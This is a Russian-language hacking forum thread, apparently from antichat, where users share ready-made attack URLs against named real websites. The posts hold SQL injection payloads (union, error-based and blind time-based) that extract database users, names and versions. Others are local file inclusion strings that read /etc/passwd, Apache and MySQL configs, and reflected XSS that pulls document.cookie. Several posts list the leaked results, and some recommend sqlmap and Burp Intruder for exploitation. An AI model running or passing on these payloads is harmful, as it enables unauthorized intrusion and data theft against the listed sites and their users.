Spoiler: инклуд Code: http://www.antiled.biz/index.php?lang=ru&menu=ss/../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
http://www.additivealert.com.au/productdetail.php?pid=3+union+select+1,2,version(),4,5,6,7,8 ще я имею задать вопрос ! Как их кошерно искать ???
XSS Code: https://poisk.ngs.ru/?q=\x3C\x2Ftitle\x3E\x3Cscript\x3Ealert\x28\x27kingbeef\x27\x29\x3C\x2Fscript\x3E®ion=50&mode=2&url=d3d3LmNvZGVuZXQucnU=
Code: http://www.dutchaero.nl/index.php?catid=3&id=-7%20union%20select%201,2,3,4,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,6-- Code: https://www.althorp.com/visits_giftshop_detail.php?catid=-1%27+or+1+group+by+mid%28user%28%29,rand%280%29|0,64%29+having+avg%280%29+--+ Code: http://www.parskado.com/category.php?CATID=2%20union%20select%20concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,2--+-
Sql-inj (Blind) Code: http://erobank.ru/section/if(now()=sysdate(),sleep(0),0)/')%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))nSVA)%20AND%20('BUui'='BUui'XOR(if(now()=sysdate(),%20sleep(0),0))OR'%22XOR(if(now()=sysdate(),sleep(0),0))OR%22/
Долго думал, выкладывать ли этот сайт, все таки поделюсь. Довольно интересный инет магазин, с кучей полезных данных. Скуля слепая, поэтому руками крутить и не брался. Легко раскручивается sqlmap'ом: Code: http://autoforsazh.ru/battery-search/?battery_brand=1&battery_capacity=;&battery_cold_start_current=;&battery_polarity=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'"%2b(select(0)from(select(sleep(0)))v)%2b"*/&items_per_page=36&item_part=&order=asc&request_url=battery-search&search_type=battery_param&size_height=1&size_length=1&size_tolerance=1&size_width=1&sort=price SQL-inj (Blind): Code: http://kharkov.ua/poisk/searchresults.php3?category=395%20AND%203*2*1%3d6%20AND%20601%3d601&mode=2 XSS: Code: http://kupitraf.com/index.php?type=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
SQLi Code: akulof.ru/modules/shop/category.php?id=-26 UNION ALL SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7 --
ТИЦ10 PR4 alvora_web_vart@localhost:alvora_database:5.5.39-cll-lve PR3 [email protected]:volumeseattle:5.0.96-log PR4 offestiv_vasco@localhostffestiv_ffo:5.0.96-community-log
Code: http://zabinfo.ru/person.php?pageid=person&idperson=-266 union select 1,user(),version(),4,database(),6,7,8,9,10,11,12,13;%00 User: zabftp@localhost Version: 5.1.48-log Database: zia_news ТИЦ: 2100 PR: 4 Code: http://museumpereslavl.ru/event.php?id=-377 union select 1,group_concat(user(),0x3c62723e,version(),0x3c62723e,database()),3,4,5,6,7,8,9--+ User: [email protected] Version: 5.5.35-1+wheezy1+mh1-log Database: u184264 ТИЦ: 190 PR: 4 Code: http://www.ukvz.ru/catalogue/view.php?id=-81' union select 1,2,3,4,group_concat(user(),0x3c62723e,version(),0x3c62723e,database()),6,7,8,9,10,11,12,13,14,15,16--+&ggid=1&flag=0 User: ukvz@localhost Version: 5.1.73-log Database: ukvz ТИЦ: 100 PR: 4
SQLi Code: http://www.barryowen.com/toys.php?catID=14&subCatID=-49+union+select+1,2,3,4,5,6,7,8,9,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,11,12,13,14,15,16+--+ Code: http://www.createwindow.com/store/crystals/index.php?CatID=-12+or+1+group+by+mid%28user%28%29,rand%280%29|0,64%29+having+avg%280%29+--+ Code: http://wpcreek.com/products.php?catid=101+union+select+1,2,3,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,5,6,7+--+-
Code: http://www.ck-oda.gov.ua/index.php?article=-254 union select 1,concat(0x3c666f6e7420636f6c6f723d7265643e,0x3e3e20496e6a65637420627920526f73736f203c3c,0x3c2f666f6e743e,0x3c62723e,0x557365723a,user(),0x3c62723e,0x56657273696f6e3a,version(),0x3c62723e,0x44617461626173653a,database(),0x3c62723e),3,4--+ User: oda@localhost Version: 5.1.60 Database: oda ТИЦ: 1200 PR: 5
http://mehfilentertainment.com/even...mn_name,3,4,5+from+information_schema.columns http://www.astorialic.org/events.ph...5,6,7,8,9,10+from+information_schema.tables-- http://www.essaygifts.co.za/catalog...ame,3,4,5,6+FROM+information_schema.columns-- http://www.editionsdusandre.com/boo...,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 http://www.wailana.com.au/catalog/p...,7,8,9,10,11+from+information_schema.tables--
Большая просьба не постить по одной уязвимости в одном сообщении. Если с Вашего поста в теме никто не писал, отредактируйте. Не стоит думать, что так вы получите больше репутации Еще совет: если это SQL, указывайте версию. Иногда пригождается проверить работу какого-либо вектора. Также, не забывайте обрамлять тегами CODE
Что-то я пока ничего не придумал, что с ним делать PHP: http://ankontr.if.ua/?a_id=6395&page=../../../../../../../../../../etc/passwd%00&type=info
Сосдай пейлоад с возможными путями http://forum.antichat.ru/threads/324564/ и пройтись Burp Suite в Intruder-e Вот конфиг апача Code: http://ankontr.if.ua/?a_id=6395&page=../../../../../etc/apache2/apache2.conf%00 MySQL Code: http://ankontr.if.ua/?a_id=6395&page=../../../../../%2fetc%2fmysql%2fmy.cnf%00
Code: http://www.keuka.edu/apps/m_directory/person.php ?id=-890' union select 1,2,concat(0x3c666f6e742020636f6c6f723d227265642220666163653d2247656f72676961223e,0x3e3e20496e6a65637420627920526f73736f203c3c,0x3c2f666f6e743e3c62723e,0x557365723a20,user(),0x3c62723e,0x56657273696f6e3a20,version(),0x3c62723e,0x44617461626173653a20,database()),4,5,6,7,8,9,10,11,12--+ User: keukawe_www@localhost Version: 5.1.72-ius Database: keukawe_directory 6 7 ТИЦ: 10 PR: 6